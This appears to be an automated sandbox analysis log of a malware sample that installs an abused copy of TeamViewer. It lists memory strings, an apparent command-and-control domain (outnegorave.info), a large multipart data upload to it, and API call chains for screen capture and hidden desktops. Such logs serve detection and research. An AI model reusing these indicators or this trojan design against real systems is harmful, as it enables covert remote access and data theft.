Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/company/index.aspx
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/download/beta.aspx
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/download/version_4x/TeamViewerQS.exe
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/download/version_5x/TeamViewerQS.exe
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/favicon.ico
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/help/connectivity.aspx:
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/help/support.aspxK
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx
Source: TeamViewer.exe, 00000006.00000002.526986525.0000000002610000.00000004.00000001.sdmpString found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx?version=
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/ja/integrated/trial.aspx?ID=%1%&IC=%2%
Source: TeamViewer.exe, 00000006.00000002.526986525.0000000002610000.00000004.00000001.sdmpString found in binary or memory: http://www.teamviewer.com/ja/licensing/commercialuse.aspx
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/licensing/commercialuse.aspx
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/licensing/register.aspx&http://www.teamviewer.com/r$$id$$.aspx7http://www.
Source: svchost.exe, 0000000A.00000002.510538467.000001D426444000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 0000000A.00000002.510538467.000001D426444000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 0000000A.00000002.510538467.000001D426444000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
Source: svchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 0000000A.00000002.510463156.000001D426429000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000A.00000002.510463156.000001D426429000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000C.00000003.308300369.000002A41625E000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000C.00000003.308381147.000002A416259000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000C.00000002.310813443.000002A41623D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000C.00000003.308381147.000002A416259000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000C.00000003.308381147.000002A416259000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 0000000C.00000002.310813443.000002A41623D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000C.00000003.285739811.000002A416231000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000C.00000002.310885401.000002A416242000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000C.00000002.310885401.000002A416242000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000C.00000003.308492112.000002A416240000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.308381147.000002A416259000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 0000000C.00000003.308300369.000002A41625E000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000C.00000003.308381147.000002A416259000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000C.00000003.308381147.000002A416259000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000C.00000003.308218425.000002A416263000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.308300369.000002A41625E000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000C.00000003.308267425.000002A416260000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000C.00000002.310813443.000002A41623D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000C.00000003.285739811.000002A416231000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: TeamViewer.exe, 00000006.00000003.384741307.000000000575A000.00000004.00000001.sdmp, TeamViewer.exe, 00000006.00000003.374180078.000000000575A000.00000004.00000001.sdmp, TeamViewer.exe, 00000006.00000003.371647867.000000000575A000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/
Source: TeamViewer.exe, 00000006.00000003.389888887.000000000575A000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/#
Source: TeamViewer.exe, 00000006.00000003.395921982.000000000575A000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/(
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmpString found in binary or memory: https://outnegorave.info/8C631A8/614&p=10000001
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmpString found in binary or memory: https://outnegorave.info/8C631A8/V3e
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmpString found in binary or memory: https://outnegorave.info/8C631A8/icrosoft
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmpString found in binary or memory: https://outnegorave.info/8C631A8/opmentProperties
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmpString found in binary or memory: https://outnegorave.info/8C631A8/opmentProperties:3
Source: TeamViewer.exe, 00000006.00000003.376075558.0000000005749000.00000004.00000001.sdmp, TeamViewer.exe, 00000006.00000003.368823662.000000000575A000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/B8C631A8/
Source: TeamViewer.exe, 00000006.00000003.376075558.0000000005749000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/B8C631A8/4
Source: TeamViewer.exe, 00000006.00000003.378667233.000000000575A000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/B8C631A8/;
Source: TeamViewer.exe, 00000006.00000003.365826240.000000000575A000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/B8C631A8/=
Source: TeamViewer.exe, 00000006.00000003.395921982.000000000575A000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/B8C631A8/W
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmpString found in binary or memory: https://outnegorave.info/B8C631A8/lPanel.dll
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmpString found in binary or memory: https://outnegorave.info/B8C631A8/mViewer
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmpString found in binary or memory: https://outnegorave.info/B8C631A8/opmentProperties
Source: TeamViewer.exe, 00000006.00000003.374180078.000000000575A000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/B8C631A8/q
Source: TeamViewer.exe, 00000006.00000003.365826240.000000000575A000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/G
Source: TeamViewer.exe, 00000006.00000003.365826240.000000000575A000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/S
Source: TeamViewer.exe, 00000006.00000003.365826240.000000000575A000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/e
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmpString found in binary or memory: https://outnegorave.info/ntsSecure-Out)LMEMX
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
Source: svchost.exe, 0000000C.00000002.310813443.000002A41623D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000C.00000002.310085553.000002A416213000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.310813443.000002A41623D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000C.00000003.308749567.000002A416245000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000C.00000003.308749567.000002A416245000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000C.00000003.285739811.000002A416231000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000C.00000003.285739811.000002A416231000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000C.00000002.310305376.000002A416224000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen19
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: TeamViewer.exe, 00000006.00000002.526986525.0000000002610000.00000004.00000001.sdmpString found in binary or memory: https://www.teamviewer.com/buy-now/?utm_medium=masterads&utm_source=master-commercial-use&utm_campai
Source: 77Etc0bR2v.exe, 00000001.00000002.248818109.0000000000409000.00000004.00020000.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmpString found in binary or memory: https://www.teamviewer.com/licensing/order.aspx?lng=ja
Source: unknownHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85134Content-Type: multipart/form-data; boundary=--------3509900953User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: unknownDNS traffic detected: queries for: ping3.dyngate.com
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF5A00 InternetOpenA,InternetOpenUrlA,CreateFileA,InternetReadFile,WriteFile,InternetReadFile,WriteFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=10241550&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=39260701&p=10000001&client=DynGate&data=FyQSiQCjHqkys5MkoZ6YmRiamBoamBuTJKIemBMmoKGemDwysbMaMTEZsLKzMLGvmLIZshiyspkxsjGYG7Mwr5kanBybGRgbmRiTJqSiHpg8MrGzGjExGbCyszCxr5iyGbIYsrKZMbIxmBuzMK+ZGpwcmxkYG5kYkyepnqu0txuTKx6YmpcYFxscG5AoqQ== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=39260701&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=39260710&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6sTY0saWyvJMkoZ6YmRiamBoamBuTJKIemZyYmBmYnBuakyakoh6YPDKxsxoxMRmwsrMwsa+YshmyGLKymTGyMZgbszCvmRqcHJsZGBuZGJMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAAiHrQD5CYOpp7/Zr7rEi/B/CnsUWehIzsjknPiOAQDnHgKBwxxFKCieiWhL1afx9eeCX4JSt5eDF8v1iZJ9o8IQAaQCrRik6ahUAKNkNBEdbLOE0i1SajuFK2r+FTuYEW7cUOxEu9d8mU9y6bkESGL5okL1ayDi3W7V7M1bCeZL HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=39260710&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=39260719&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s7cwujq5MqWyvJMkoZ6YmRiamBoamBuTJKIemZyYmBmYnBuakyakoh6YPDKxsxoxMRmwsrMwsa+YshmyGLKymTGyMZgbszCvmRqcHJsZGBuZGJMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAAC+ETh/xoaDswnDrzpj2ezWmEgvX0+Ej1wtEYkKVyn+ydtvyFua/3Iri8RKmf9YcE9fPWO9gKA702VTWXdcuP9paHCFsUzDIqXKZ7SOAdSL0LmDI+BCYg1VARH3ovhl/wWKHhKvbobA55zrvFJv9j5s06datZSDN5Epd+G/FNL5V HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=39260719&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=39260736&p=10000001&client=DynGate&data=FyQS+gChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmRiamBoamBuTJKIemZyYmBmYnBuakyWysrgwtjS7Mp6YkyYwtzO6sLOynrUwkyY0sbK3ObKqPLgynpgTJqSiHpg8MrGzGjExGbCyszCxr5iyGbIYsrKZMbIxmBuzMK+ZGpwcmxkYG5kYkyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpwTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=39260736&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 178.255.154.140Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=12652280&m=fast&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 178.255.154.140Connection: Keep-AliveCache-Control: no-cache
Source: unknownHTTPS traffic detected: 172.67.205.33:443 -> 192.168.2.5:49752 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF66E0 GetDesktopWindow,GetDC,CreateCompatibleDC,RtlZeroMemory,GetWindowRect,CreateCompatibleBitmap,SelectObject,BitBlt,RtlZeroMemory,GetCursorInfo,RtlZeroMemory,GetIconInfo,RtlZeroMemory,GetObjectA,DrawIconEx,SHCreateMemStream,RtlZeroMemory,VirtualAlloc,RtlZeroMemory,VirtualFree,DeleteObject,DeleteDC,ReleaseDC,
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,SendMessageA,GlobalUnWire,SetClipboardData,CloseClipboard,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF9BD0 GetCurrentThreadId,GetThreadDesktop,CreateDesktopA,CreateThread,WaitForSingleObject,CloseHandle,Sleep,CloseDesktop,
Source: 77Etc0bR2v.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_0040323C EntryPoint,73D1E7F0,SetErrorMode,OleInitialize,SHGetFileInfo,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcat,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcat,lstrcmpi,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6EAF5B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,FrostCrashedWindow,FrostCrashedWindow,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 6_2_6EAF5B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
